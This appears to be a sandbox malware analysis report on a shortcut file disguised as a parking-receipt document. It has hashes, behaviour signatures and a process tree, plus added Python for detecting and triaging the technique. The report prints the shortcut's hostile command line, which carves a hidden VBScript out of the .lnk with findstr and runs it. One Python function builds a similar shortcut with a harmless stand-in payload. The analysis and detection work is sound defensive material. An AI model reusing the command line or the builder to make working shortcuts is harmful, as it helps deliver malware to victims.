Analysis
max time kernel: 93s
max time network: 125s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-05-2024 17:34
Static task: static1
Behavioral task: behavioral1 (sample Parking_Receipt_5.doc.lnk, resource win7-20240508-en)
Behavioral task: behavioral2 (sample Parking_Receipt_5.doc.lnk, resource win10v2004-20240508-en)
General
Target: Parking_Receipt_5.doc.lnk
Size: 9KB
MD5: 2ef37d3814879f5c1e57bbb61642e6f7
SHA1: a8ead0c5e0b5e150f9f8945065e151434991123f
SHA256: eb17b9b7a32be1e5056b599e859e3bf46b0c55fd7334775f5b3548f49a74d8ce
SHA512: bbd46965cdf208d97fa2093f19d4eb1a05ebc4fff2885f9c75cbc345b7009ff30b6e3d8b2d14b3486aeda7be6c754946bdcec5b034db78888773933eff91b9a0
SSDEEP: 96:8Bdb3k4wk2houqRHMEA3ws/c1T0RdoyG37uv:8BRURhm2cs/cB0Tc3K
Malware Config
Signatures
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence check.
  cmd.exe: key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation
  cmd.exe: key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
  cmd.exe: key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings

Suspicious use of WriteProcessMemory (6 IoCs)
  PID 1388 (cmd.exe) wrote to memory of PID 2072 (cmd.exe)
  PID 1388 (cmd.exe) wrote to memory of PID 2072 (cmd.exe)
  PID 2072 (cmd.exe) wrote to memory of PID 2384 (findstr.exe)
  PID 2072 (cmd.exe) wrote to memory of PID 2384 (findstr.exe)
  PID 2072 (cmd.exe) wrote to memory of PID 4312 (WScript.exe)
  PID 2072 (cmd.exe) wrote to memory of PID 4312 (WScript.exe)
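The WriteProcessMemory IoCs above are really a parent/child record: cmd.exe 1388 spawns cmd.exe 2072, which spawns findstr.exe 2384 and WScript.exe 4312. As an added example (not part of the sandbox report or its tooling), the following Python turns that chain into a detection over process-creation events. The events are constructed here in a Sysmon Event ID 1-like shape from the report's PIDs and command lines; the field names (pid, ppid, image, cmdline) are this example's own convention rather than any product schema, and the parent PID 900 and the two benign findstr-over-a-log events are invented context.

```python
"""Detect the cmd.exe -> findstr.exe (reads .lnk) + script host (runs %TEMP%\\*.vbs)
chain seen in the Parking_Receipt_5.doc.lnk report. Added example; the
events below are constructed from the report's process tree."""
import re
from collections import defaultdict

LNK_RX = re.compile(r"\.lnk\b", re.I)
TEMP_SCRIPT_RX = re.compile(r"\\Temp\\[^\s\"]+\.(?:vbs|vbe|js|jse|wsf|hta|bat|cmd|ps1)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

# Constructed events. PIDs, images and command lines 1388/2072/2384/4312 are
# the report's; ppid 900 (the launcher) and the two log-search events are made up.
SAMPLE_EVENTS = [
    {"pid": 1388, "ppid": 900, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\Parking_Receipt_5.doc.lnk"},
    {"pid": 2072, "ppid": 1388, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c zlAIE & (findstr "execu.*" Parking_Receipt_5.doc.lnk > '
                r'"C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs" & "C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs") & yJYAz'},
    {"pid": 2384, "ppid": 2072, "image": r"C:\Windows\system32\findstr.exe",
     "cmdline": r'findstr "execu.*" Parking_Receipt_5.doc.lnk'},
    {"pid": 4312, "ppid": 2072, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs"'},
    # Benign noise: an operator grepping a log file. Must not fire.
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c findstr "error" C:\logs\app.log'},
    {"pid": 5001, "ppid": 5000, "image": r"C:\Windows\system32\findstr.exe",
     "cmdline": r'findstr "error" C:\logs\app.log'},
]


def image_name(path):
    """Basename of an image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_lnk_carve_chain(events):
    """Flag a cmd.exe whose command line names a .lnk and whose children include
    BOTH findstr.exe reading a .lnk and a script host running a script from a
    Temp directory. Requiring both siblings keeps findstr-over-a-log and lone
    WScript launches from firing on their own."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    findings = []
    for e in events:
        if image_name(e["image"]) != "cmd.exe" or not LNK_RX.search(e["cmdline"]):
            continue
        kids = children[e["pid"]]
        carvers = [k for k in kids
                   if image_name(k["image"]) == "findstr.exe" and LNK_RX.search(k["cmdline"])]
        hosts = [(k, TEMP_SCRIPT_RX.search(k["cmdline"])) for k in kids
                 if image_name(k["image"]) in SCRIPT_HOSTS]
        hosts = [(k, m) for k, m in hosts if m]
        if not (carvers and hosts):
            continue
        parent = by_pid.get(e["ppid"])
        findings.append({
            "cmd_pid": e["pid"],
            "parent_cmdline": parent["cmdline"] if parent else None,
            "carver_pid": carvers[0]["pid"],
            "script_host_pid": hosts[0][0]["pid"],
            "dropped_script": hosts[0][1].group(0),
        })
    return findings


if __name__ == "__main__":
    for f in detect_lnk_carve_chain(SAMPLE_EVENTS):
        print(f)
```

The rule keys on the 2072 cmd.exe, not the outer 1388 one: the outer process is the sandbox launching the shortcut and only has another cmd.exe as a child. The Geo\Nation registry read listed above is a separate telemetry source (registry value reads are not process-creation events) and is left out of this rule.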
Processes
[1] C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Parking_Receipt_5.doc.lnk
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c zlAIE & (findstr "execu.*" Parking_Receipt_5.doc.lnk > "C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs" & "C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs") & yJYAz
      - Checks computer location settings
      - Modifies registry class
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\findstr.exe
        findstr "execu.*" Parking_Receipt_5.doc.lnk
    [3] C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs"

Reading the tree: the outer cmd.exe is the sandbox opening the shortcut; the second cmd.exe is the shortcut's own command line. zlAIE and yJYAz are not commands (cmd reports them as unrecognized and continues, because & runs the next command regardless of the previous one's result); the working part is findstr, which copies every line of the .lnk file itself matching the regex execu.* into gnzoM.vbs, after which WScript.exe runs that file. The script is therefore carried inside the 9KB shortcut and the 7KB gnzoM.vbs is carved out of it, with no network download.
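As an added example (not part of the sandbox report or the sample), the following Python does the static side of this triage: it reads the shortcut's command-line arguments out of the Shell Link StringData, emulates the `findstr "execu.*"` carve over the raw bytes, and reports the suspicious combination. The LNK bytes and the three script lines are constructed here; the real gnzoM.vbs is known to the report only by hash and size, and placing the script after the link structure with an "execute" token on every line is this example's assumption about how the carve is made to work.

```python
"""Static triage of a findstr-carved LNK. Added example; the shortcut and the
script lines are constructed, only the command line is the report's."""
import re
import struct

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
               (HAS_ICON, "icon_location")]  # fixed order per MS-SHLLINK

# Command line as shown in the report's process tree.
REPORT_ARGS = ('/c zlAIE & (findstr "execu.*" Parking_Receipt_5.doc.lnk > '
               '"C:\\Users\\Admin\\AppData\\Local\\Temp\\gnzoM.vbs" & '
               '"C:\\Users\\Admin\\AppData\\Local\\Temp\\gnzoM.vbs") & yJYAz')
# Constructed stand-in payload: every line carries "execute" so findstr keeps all of it.
CONSTRUCTED_PAYLOAD = [
    b"' execute: constructed stand-in for the real gnzoM.vbs",
    b'Set sh = CreateObject("WScript.Shell") \' execute',
    b'sh.Popup "stage two would run here" \' execute',
]


def build_lnk(arguments, payload_lines):
    """Constructed LNK: ShellLinkHeader + StringData, then the script appended
    after the link structure (assumption; the report only shows it is carved)."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = (struct.pack("<I", 0x4C) + LINK_CLSID + struct.pack("<I", flags)
              + struct.pack("<I", 0x20)            # FileAttributes: ARCHIVE
              + b"\x00" * 24                       # Creation/Access/Write FILETIMEs
              + struct.pack("<IiIH", 0, 0, 7, 0)   # FileSize, IconIndex, SW_SHOWMINNOACTIVE, HotKey
              + b"\x00" * 10)                      # Reserved1..3
    assert len(header) == 0x4C

    def string_data(s):                            # CountCharacters + UTF-16LE chars
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    link = header + string_data("..\\..\\..\\Windows\\System32\\cmd.exe") + string_data(arguments)
    return link + b"\r\n" + b"\r\n".join(payload_lines) + b"\r\n"


def parse_lnk(blob):
    """Walk the Shell Link far enough to read StringData. ExtraData blocks are
    not parsed and end up in the tail; a large tail is itself a cue."""
    if len(blob) < 0x4C or blob[:4] != b"\x4c\x00\x00\x00" or blob[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", blob, 0x14)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:                        # IDListSize (2) + IDList
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", blob, pos)[0]
    fields = {}
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = blob[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
        pos += count * width
    fields["tail_bytes"] = len(blob) - pos
    return fields


def findstr(pattern, blob):
    """Emulate `findstr "<pattern>"`: the pattern is a regex and every matching
    line is printed, so a script whose lines all carry the token comes out
    intact. The UTF-16 command line never matches an ASCII regex, which is why
    the carve does not pick up the shortcut's own fields."""
    rx = re.compile(pattern.encode())
    return [ln.rstrip(b"\r") for ln in blob.split(b"\n") if rx.search(ln)]


def triage(blob, carve_pattern="execu.*"):
    """Combine the parsed arguments with the carve and return the indicators."""
    f = parse_lnk(blob)
    args = f.get("arguments", "")
    return {
        "findstr_reads_lnk": bool(re.search(r"findstr\b.*\.lnk\b", args, re.I)),
        "drops_script_in_temp": bool(re.search(r"\\Temp\\[^\"\s]+\.(?:vbs|js|bat|ps1)\b", args, re.I)),
        "tail_bytes": f["tail_bytes"],
        "carved_script": b"\n".join(findstr(carve_pattern, blob)),
        "fields": f,
    }


if __name__ == "__main__":
    result = triage(build_lnk(REPORT_ARGS, CONSTRUCTED_PAYLOAD))
    for key in ("findstr_reads_lnk", "drops_script_in_temp", "tail_bytes"):
        print(key, result[key])
    print(result["carved_script"].decode())
```

On a real sample, run `triage(open(path, "rb").read())`; the arguments field alone (findstr naming a .lnk, a redirect into Temp, a script host or the script invoked directly) is enough to flag the file before anything is executed, and the carved bytes give you the script to hash against the 7KB gnzoM.vbs in the Downloads section.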
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs
Filesize: 7KB
MD5: 0ccb5ac219b4bca69895368631d4d951
SHA1: 9d27df981760e94871b5bd9850fe4ce95ed11ede
SHA256: c6e8e7340deba567e9e908ec7e909b669882bde38690cf372bdcdfa2eb77bc99
SHA512: 43fb935c8075820e2f68c0eb345c02c6588cd0f1355da94865cb683bd5964783ebfc8d3182285d2fd09fd8779e62166873dd9965e742e1b6b0e291e1bda9e87a